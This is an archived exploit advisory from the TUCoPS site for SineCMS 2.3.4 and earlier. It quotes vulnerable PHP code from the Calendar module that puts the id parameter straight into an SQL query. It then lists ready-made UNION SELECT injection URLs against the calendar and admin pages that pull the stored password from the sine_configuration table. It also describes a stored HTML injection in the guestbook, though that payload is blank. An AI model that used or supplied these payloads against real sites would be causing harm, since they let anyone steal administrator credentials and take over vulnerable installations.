Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: tb13715.htm

SineCMS <= 2.3.4 Calendar SQL Injection 'n something else..



SineCMS <= 2.3.4 Calendar SQL Injection 'n something else..
SineCMS <= 2.3.4 Calendar SQL Injection 'n something else..



---------------------------------------------------------------=0D
 ____            __________         __             ____  __   =0D
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ =0D
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\=0D
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  =0D
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  =0D
          \/\______|      \/     \/                         =0D
---------------------------------------------------------------=0D
=0D
Http://www.inj3ct-it.org 	 Staff[at]inj3ct-it[dot]org =0D 
=0D
---------------------------------------------------------------=0D
=0D
SineCMS <= 2.3.4 Calendar SQL Injection 'n something else..=0D
=0D
---------------------------------------------------------------=0D
=0D
#By KiNgOfThEwOrLd				=0D
=0D
---------------------------------------------------------------=0D
Notes:=0D
=0D
Only with magic_quotes_gpc -> Off=0D
---------------------------------------------------------------=0D
Corrupted file: =0D
=0D
mods/Calendar/index.php=0D
---------------------------------------------------------------=0D
Corrupted code:=0D
=0D
[...]=0D
function Evento ($sine){=0D
	if (!isset($_GET[id]) OR $_GET[id]=="") {=0D
	header("Location: index.php");=0D
	}=0D
	$query = "SELECT * FROM ".$sine[db][prefisso_tab]."calendario WHERE id='$_GET[id]'";=0D
	if ($_GET[id]){=0D
		$result = mysql_query($query, $sine[db][db]);=0D
		$row = mysql_fetch_array($result);=0D
[...]=0D
---------------------------------------------------------------=0D
Exploit:=0D
=0D
http://[target]/[sinecms_path]/mods.php?mods=Calendar&action=info&id='+union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/*=0D 
---------------------------------------------------------------=0D
Something else..=0D
=0D
There are a lots of useless sql injection in the admin panel, like...=0D
=0D
http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Guestbook&action=modifica&id='+union+select+1,2,3,4,password,6+from+sine_configuration/*=0D 
=0D
http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&mese=11'+union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/*=0D 
=0D
http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&action=modify&id='+union+select+1,2,3,4,password,6,7,8,9+from+sine_configuration/*=0D 
=0D
http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&anno='+union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/*=0D 
=0D
and much more..=0D
---------------------------------------------------------------=0D
There is also a permanent html injection in the guestbook, and i belive it can be considered so dangerous, coz the "last comments" module it's included in all the pages...then, an attacker can rewrite alle the pages posting a comment like=0D
=0D
=0D
=0D
in the "username" or "comment" field.=0D
---------------------------------------------------------------=0D
=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH